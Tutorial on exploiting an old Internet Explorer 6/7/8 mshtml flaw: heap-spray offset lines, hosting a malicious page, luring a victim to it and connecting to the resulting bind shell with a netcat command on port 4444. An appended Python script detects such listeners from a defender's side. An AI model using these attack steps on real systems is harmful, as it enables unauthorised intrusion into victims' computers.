Type : Tutorial
Level : Easy
This tutorial covers the same exploit as IE 6,7,8 Exploit using Metasploit, but I have tried to make it simpler for you.
1. Arbitrary Code (don't open it with Internet Explorer; use a text editor to modify it)
FAKEOBJ = alloc(233120, FAKEOBJ); // IE6 mshtml.dll Version 6.0.2900.5512
//FAKEOBJ = alloc(241748, FAKEOBJ); // IE6 mshtml.dll Version 6.00.2900.6036
//FAKEOBJ = alloc(733120, FAKEOBJ); // IE7 mshtml.dll Version 7.00.6000.17080
//FAKEOBJ = alloc(433120, FAKEOBJ); // IE8 mshtml.dll Version 8.00.6001.18939
//FAKEOBJ = alloc(1294464, FAKEOBJ); // IE8 mshtml.dll Version 8.00.6001.18975
//FAKEOBJ = alloc(1550371, FAKEOBJ); // oy oy oy huge spray!
Uncomment the line for the IE version you want to exploit. In this case I'm using IE6 on Windows XP SP3.
Download Source Code: Mediafire.com
2. NetCat (Windows/Linux)
My IP Address: 192.168.1.8 (attacker)
Victim IP Address: 192.168.1.3 (Windows XP SP3, IE6)
1. Create your own web server (Windows users can use XAMPP) and copy index.html into your htdocs/exploit/ folder. (You can view the tutorials here in options 1 and 2)
2. Open NetCat and run the command nc -nv 192.168.1.3 4444. We try to connect on port 4444 because the arbitrary code opens port 4444 on the remote computer.
If we run NetCat before the user has opened the arbitrary code, nothing happens.
3. Send the URL to your victim (http://192.168.1.8/exploit/index.html) where index.html is your arbitrary code.
4. After the user opens the URL, run NetCat once again with nc -nv 192.168.1.3 4444 and see what happens 🙂 You are now inside the victim's computer.
DONE.
I hope this post is useful for you. If you have any questions, just leave a comment here.
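From the defender's side, the listener that step 2 connects to is visible on the victim host as a TCP socket in LISTENING state on port 4444. The following is an added example, not part of the original tutorial: it parses `netstat -ano` and `tasklist /fo csv /nh` output and flags such listeners. The sample data, PIDs, function names and the assumption that the browser process owns the socket are all constructed for illustration.

```python
import csv
import io

# Constructed `netstat -ano` output from the victim host (192.168.1.3); not real data.
NETSTAT_SAMPLE = """
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING       1820
  TCP    192.168.1.3:1045       192.168.1.8:80         ESTABLISHED     1820
  UDP    0.0.0.0:445            *:*                                    4
"""
# Constructed `tasklist /fo csv /nh` output; PIDs are made up to match the sample above.
TASKLIST_SAMPLE = '''
"svchost.exe","912","Console","0","4,120 K"
"iexplore.exe","1820","Console","0","23,456 K"
'''
WATCH_PORTS = {4444}         # port the tutorial's payload listens on
BROWSERS = {"iexplore.exe"}  # assumption: a browser has no reason to accept inbound TCP

def parse_listeners(netstat_text):
    """Return (port, pid) for every TCP socket in the LISTENING state."""
    listeners = []
    for line in netstat_text.splitlines():
        fields = line.split()
        # Header, UDP and non-listening rows fail this test and are skipped.
        if len(fields) == 5 and fields[0] == "TCP" and fields[3] == "LISTENING":
            listeners.append((int(fields[1].rpartition(":")[2]), int(fields[4])))
    return listeners

def parse_tasklist(csv_text):
    """Map PID -> lower-cased image name."""
    return {int(r[1]): r[0].lower() for r in csv.reader(io.StringIO(csv_text)) if len(r) >= 2}

def suspicious_listeners(netstat_text, tasklist_text):
    """Flag listeners on a watched port or owned by a browser process."""
    names = parse_tasklist(tasklist_text)
    findings = []
    for port, pid in parse_listeners(netstat_text):
        image = names.get(pid, "unknown")
        reasons = []
        if port in WATCH_PORTS:
            reasons.append("watched port")
        if image in BROWSERS:
            reasons.append("browser owns listening socket")
        if reasons:
            findings.append((port, pid, image, reasons))
    return findings

if __name__ == "__main__":
    print(suspicious_listeners(NETSTAT_SAMPLE, TASKLIST_SAMPLE))
```

The second rule matters more than the first: the port number is trivially changed, while a browser process owning any listening socket is anomalous regardless of port.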